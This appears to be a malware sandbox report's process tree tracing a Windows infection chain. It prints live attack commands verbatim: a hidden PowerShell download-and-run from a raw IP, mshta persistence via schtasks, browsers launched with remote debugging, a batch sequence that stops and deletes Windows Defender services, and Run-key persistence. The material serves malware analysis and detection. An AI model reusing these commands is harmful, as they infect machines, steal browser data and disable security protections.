- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:6000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn EmIJHmaHeti /tr "mshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6024 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn EmIJHmaHeti /tr "mshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3744
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Users\Admin\AppData\Local\Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE"C:\Users\Admin\AppData\Local\Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:5360
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4408248⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Architecture.wmv8⤵
- System Location Discovery: System Language Discovery
PID:3100
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Offensive" Inter8⤵
- System Location Discovery: System Language Discovery
PID:1200
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com8⤵
- System Location Discovery: System Language Discovery
PID:5704
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h8⤵
- System Location Discovery: System Language Discovery
PID:3716
-
-
C:\Users\Admin\AppData\Local\Temp\440824\Organizations.comOrganizations.com h8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 9129⤵
- Program crash
PID:3592
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:5852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6024 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:380 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff97b8edcf8,0x7ff97b8edd04,0x7ff97b8edd108⤵PID:5208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1984 /prefetch:28⤵PID:5020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2232,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:38⤵PID:1564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2536 /prefetch:88⤵PID:3888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:18⤵
- Uses browser remote debugging
PID:5180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3300 /prefetch:18⤵
- Uses browser remote debugging
PID:640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4272 /prefetch:28⤵
- Uses browser remote debugging
PID:4884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4552 /prefetch:18⤵
- Uses browser remote debugging
PID:5608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4804,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4812 /prefetch:88⤵PID:1140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4716,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4944 /prefetch:88⤵PID:2392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5276,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5292 /prefetch:88⤵PID:5212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5168 /prefetch:88⤵PID:232
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:13012 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x260,0x7ff97a4df208,0x7ff97a4df214,0x7ff97a4df2208⤵PID:13692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1928,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=1924 /prefetch:28⤵PID:13984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2224,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:38⤵PID:13996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1936,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:88⤵PID:14200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=3664 /prefetch:18⤵
- Uses browser remote debugging
PID:6412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:18⤵
- Uses browser remote debugging
PID:6420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\d2dbi" & exit7⤵
- System Location Discovery: System Language Discovery
PID:10728 -
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:10884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1136
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4624
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5724
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\10297860101\y0u3d_003.exe"C:\Users\Admin\AppData\Local\Temp\10297860101\y0u3d_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:672 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:804 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6840
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\{99e2948d-c006-4262-bf92-4d4b77e0d141}\3ff3734d.exe"C:\Users\Admin\AppData\Local\Temp\{99e2948d-c006-4262-bf92-4d4b77e0d141}\3ff3734d.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:11192 -
C:\Users\Admin\AppData\Local\Temp\{05af628d-7e82-459c-857b-141ba889bda8}\d91c7611.exeC:/Users/Admin/AppData/Local/Temp/{05af628d-7e82-459c-857b-141ba889bda8}/\d91c7611.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Checks for any installed AV software in registry
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:12132
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe"C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2080
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4688
-
-
-
C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7824 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7968 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21DB.tmp\21DC.tmp\21DD.bat C:\Users\Admin\AppData\Local\Temp\11.exe"8⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3356 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2277.tmp\2278.tmp\2279.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"10⤵
- Drops file in Program Files directory
PID:2844 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:8376
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4764
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:8428
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:8460
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:8504
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4688
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4904
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:8596
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:4216
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:8660
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:4768
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:8712
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:8748
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:8784
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:8820
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:8852
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:1176
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:8944
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:8984
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:9040
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:9084
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:9116
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:9168
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:9188
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:4844
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:824
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:9256
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:9300
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:9332
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:9376
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:9392
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:9424
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:9456
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:9508
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:9540
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:9568
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:9616
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:9684
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:9708
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:9748
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:9792
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:9816
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:9868
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:9900
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:9932
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:9972
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:10000
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:10036
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:10092
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:10132
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:10200
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:10232
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:5988
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:1944
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:10268
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:10320
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:10376
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:10440
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:10496
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4316
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:10572
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"6⤵
- Executes dropped EXE
PID:9624 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s7⤵
- Modifies registry key
PID:9220
-
-
C:\Windows\system32\reg.exereg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 470" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe\" /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:9076
-
-
